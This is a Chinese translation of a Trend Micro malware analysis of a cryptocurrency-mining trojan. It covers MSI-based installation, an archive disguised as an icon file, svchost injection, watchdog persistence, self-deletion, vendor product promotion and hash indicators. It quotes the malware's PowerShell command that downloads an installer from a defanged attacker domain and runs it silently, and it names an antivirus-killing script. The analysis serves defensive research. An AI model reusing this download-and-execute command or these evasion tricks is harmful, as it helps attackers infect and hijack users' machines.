虛擬貨幣挖礦病毒的驚人成長不只是因為它能夠賺錢的潛力,也因為它可以待在系統內不被發現,特別使用了各種混淆技術。對許多駭客來說,讓惡意軟體保持隱形而難以被偵測是必須面對的課題,以趨勢科技發現新的挖礦病毒: Coinminer.Win32.MALXMR.TIAOODAM為例,它便會使用多種混淆和封裝新技術。
安裝行為
圖1、惡意軟體感染鏈
此病毒是以Windows Installer MSI檔的形式出現,這很值得注意,因為Windows Installer是用來安裝軟體的合法應用程式。利用真正的Windows套件來讓自己看起來不那麼可疑,並且可能繞過某些安全過濾程式。
它會自己安裝到資料夾 AppData%\Roaming\Microsoft\Windows\Template\FileZilla Server,如果使用者的電腦裡沒有此資料夾就會自行建立。這資料夾包含其活動所需的檔案:
- bat – 用來終止列表內的執行中防毒軟體程序的腳本檔案
- exe – 提供給資料夾內另一個檔案icon.cio所用的解壓縮工具
- ico – 偽裝成圖示檔案的密碼保護zip檔
解壓縮icon.ico後出現兩個附加檔案:
- ocx – 用來解密和安裝虛擬貨幣挖礦模組的載入模組
- bin – 用UPX封裝且加密過的Delphi編譯虛擬貨幣挖礦模組
安裝過程的下一步會將核心檔案ntdll.dll和Windows USER元件user32.dll複製到%AppData%\Roaming\Microsoft\Windows\Template\FileZilla Server\{Random Numbers}。我們推測這樣可能是為了防止偵測惡意軟體的API。接著是將以下設定檔(包括挖礦程式的)放到%UserTemp%\[Random Number]資料夾。
圖2、挖礦程式設定檔
有意思的是,安裝過程使用的是西里爾語(而非英語),可能表示這惡意軟體來自該地區。
圖3、安裝期間顯示的視窗
分析程序(process)注入和監視程式(watchdog)建立
安裝完成後,ex.exe會解壓縮icon.ico,接著執行以下命令:
- rundll32 default.ocx,Entry u
接著它會建立三個新Service Host(svchost.exe)程序以注入程式碼。第一個和第二個SvcHost程序會成為監視程式,可能是用來保持持續性。任何被注入的svchost程序終止時,它們會透過Powershell命令來重新下載Windows Installer(.msi)檔案:
- “powershell.exe -command $cli = new-Object System.Net.WebClient;$cli.Headers[‘User-Agent’] = ‘Windows Installer’;$f = ‘C:\%UserTemp%\{random number}.msi’; $cli.DownloadFile(‘hxxps://superdomain1709[.]info/update[.]txt’, $f);Start-Process $f -ArgumentList ‘/q’”
接著第三個SvcHost程序會被注入coinminer模組,並用以下命令執行:
- “%system32%\svchost.exe –config={malware configuration path}
圖4、三個Service Host程序的截圖
為了讓偵測和分析更加困難,這隻病毒還具備自毀機制。首先,它會建立並執行以下檔案:
- {隨機字元}.cmD <- 自我刪除命令行腳本
接著會刪除安裝目錄下的每個檔案,並刪除系統內的安裝痕跡。
一個值得注意的地方是,這隻病毒使用流行的客製化Windows Installer建立程式WiX封裝,很可能是為了多加一層防止被偵測的保護。這顯示了駭客有多努力地想要確保自己的創作不被發現。
趨勢科技解決方案
虛擬貨幣挖礦病毒的持續演進 – 不斷加入躲避偵測技術,代表著使用者需要更加強大的安全工具來保護自己對抗這些威脅。
趨勢科技的端點解決方案(如趨勢科技Smart Protection Suites和Worry-Free Business Security)可以偵測惡意檔案和郵件,並且封鎖所有相關惡意網址來保護使用者和企業免於此威脅。趨勢科技的Deep Discovery具備電子郵件檢查能力,可以偵測惡意附件檔和網址來保護企業。
趨勢科技的XGen™ 防護跨世代的混合威脅防禦技術,可以保護系統抵禦各類型的威脅,包括勒索病毒和虛擬貨幣挖礦病毒。它在閘道和端點提供高保真機器學習(Machine learning,ML)功能,可以保護實體、虛擬和雲端的工作環境。使用網頁/網址過濾、行為分析和客製化沙盒等功能,XGen安全防護技術可以抵禦今日特製來繞過傳統安全防護的惡意威脅;針對已知、未知或未披露的漏洞攻擊;竊取/加密個人身份資料;或是惡意虛擬貨幣挖礦等等。精準、最佳化、環環相扣的XGen防護技術驅動著趨勢科技一系列的防護解決方案:Hybrid Cloud Security(混合式雲端防護),User Protection(使用者防護)和Network Defense(內網防護)。
入侵指標(IoC)
偵測為Trojan.BAT.TASKILL.AA
檔案:f.bat_
- 90ae20b30866bc6dbffd41869ccb642b3802f03d18df19e6c1dcab260bbeba7d
偵測為Coinminer.Win32.MALXMR.TIAOODAM
檔案:sup.msi_
- 8de725e349bb8d373763470ca6bcfd45e0b86839519f216ff436d3b8452d2248
檔案:[68E256]
- 95bdcfb385acd09029e93f2d0024a4c8e9b3c0be8e5091b63d98e9d88b9cc33b
檔案:_01700000.mem_
- ccd609dc059a7bed7bf33c6d7dbd155fb40cdfd7d0091a9809f7f158ecd181bc
檔案:[61580]
- a3f34851af892bc0d257f911dd325ebbb959c26533a3c68f15773a633f6c4d38
檔案:ex.exe_
- 8d9b5190aace52a1db1ac73a65ee9999c329157c8e88f61a772433323d6b7a4a
檔案:icon.ico
- 34d1ba59bc22c0b1c1ce46327efdf3286dec4c54e2482986a0478b27bb3cf48b
檔案:default.ocx_
- 8be47acf7e9ce316d0b39b65363fc154a83f6946233eebf494216f01e52c44f5
檔案:unpacked_data.bin_
- 9a2eaaba3357f4addbc56bc7eaa2288e813fdcd1cb086efb3ad20d912968a251
@原文出處:Cryptocurrency Mining Malware uses Various Evasion Techniques, Including Windows Installer, as Part of its Routine 作者:Janus Agcaoili和Gilbert Sison